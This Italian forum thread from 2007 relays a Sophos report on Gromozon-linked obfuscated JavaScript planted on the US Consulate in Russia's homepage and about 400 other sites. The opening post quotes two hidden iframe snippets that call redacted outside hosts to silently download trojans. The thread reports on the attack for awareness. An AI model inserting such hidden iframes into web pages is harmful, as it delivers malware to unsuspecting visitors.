Un grande pesce preso nella rete - ancora Gromozon

xcdegasp · 14-09-2007, 12:53

Alcuni giorni fa SophosLabs ha individuato un javascript offuscato (Mal/ObfJS-C) nella homepage del Consolato degli Stati Uniti in Russia.

Analizzando il codice sorgente si può notare los cript offuscato e criptato:

lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima:

Codice:

<iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe>

Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione:

1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg.

2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo.

3. Ogni vettore fa installare un trojan.

La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo:

Codice:

<iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe>

L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico".

Fonte: sophos.com

c.m.g · 14-09-2007, 16:52

mi chiedo quando saranno fermati!

pistolino · 14-09-2007, 17:04

Subito dopo aver letto il titolo "Un grande pesce preso nella rete", ho chiamato il super-eroe che debellerà il male rappresentato da Gromozon:

Si salvi chi può.

Regards

BEY0ND · 14-09-2007, 17:17

mica l'avrà catturato lui???

c.m.g · 14-09-2007, 18:16

finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum

ovviamente si scherza!

sampei.nihira · 14-09-2007, 18:24

Quote:

Originariamente inviato da c.m.g

finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum

ovviamente si scherza!

c.m.g · 15-09-2007, 07:08

Quote:

Originariamente inviato da sampei.nihira

xcdegasp · 17-09-2007, 09:46

e giusto poco fa' ecco che mi è successo:

Quote:

Requested URL: hxxp://geniv.forumcommunity.net/?t=6226730
Information: Contains suspicious code HEUR/Exploit.HTML

pure forumcommunity.net stanno infettando?

lancetta · 17-09-2007, 10:19

Quote:

Originariamente inviato da xcdegasp

e giusto poco fa' ecco che mi è successo:

pure forumcommunity.net stanno infettando?

e sì....

la recrudescenza verso l'italia sta raggiungendo un nuovo picco

xcdegasp · 17-09-2007, 10:56

non vedo l'ora di vederli alla gogna sti ....

14-09-2007, 12:53	#1
xcdegasp Senior Member Iscritto dal: Nov 2001 Città: Fidenza(pr) da Trento Messaggi: 27479	Un grande pesce preso nella rete - ancora Gromozon Alcuni giorni fa SophosLabs ha individuato un javascript offuscato (Mal/ObfJS-C) nella homepage del Consolato degli Stati Uniti in Russia. Analizzando il codice sorgente si può notare los cript offuscato e criptato: lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima: Codice: <iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe> Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione: 1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg. 2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo. 3. Ogni vettore fa installare un trojan. La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo: Codice: <iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe> L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico". Fonte: sophos.com __________________ "Visti da vicino siamo tutti strani..." ~\|~ What Defines a Community? ~\|~ Thread eMule Ufficiale ~\|~ Online Armor in Italiano ~\|~ Regole di Sezione ~\|► Guida a PrivateFirewall quinto potere ~\|~ Le illusioni della TV

17-09-2007, 10:56	#10
xcdegasp Senior Member Iscritto dal: Nov 2001 Città: Fidenza(pr) da Trento Messaggi: 27479	non vedo l'ora di vederli alla gogna sti .... __________________ "Visti da vicino siamo tutti strani..." ~\|~ What Defines a Community? ~\|~ Thread eMule Ufficiale ~\|~ Online Armor in Italiano ~\|~ Regole di Sezione ~\|► Guida a PrivateFirewall quinto potere ~\|~ Le illusioni della TV

14-09-2007, 16:52	#2
c.m.g Senior Member Iscritto dal: Mar 2006 Messaggi: 22121	mi chiedo quando saranno fermati!

14-09-2007, 17:04	#3
pistolino Senior Member Iscritto dal: Jan 2005 Messaggi: 7200	Subito dopo aver letto il titolo "Un grande pesce preso nella rete", ho chiamato il super-eroe che debellerà il male rappresentato da Gromozon: Si salvi chi può. Regards

14-09-2007, 17:17	#4
BEY0ND Senior Member Iscritto dal: Apr 2007 Messaggi: 2306	mica l'avrà catturato lui???

14-09-2007, 18:16	#5
c.m.g Senior Member Iscritto dal: Mar 2006 Messaggi: 22121	finalmente abbiamo capito chi è che insegna a questi criminali le tecniche di phishing... ebbene si, sampei.nihira che è anche una spia di questi criminali mandati su questo forum ovviamente si scherza!

Strumenti
Mostra una versione stampabile Invia questa pagina per email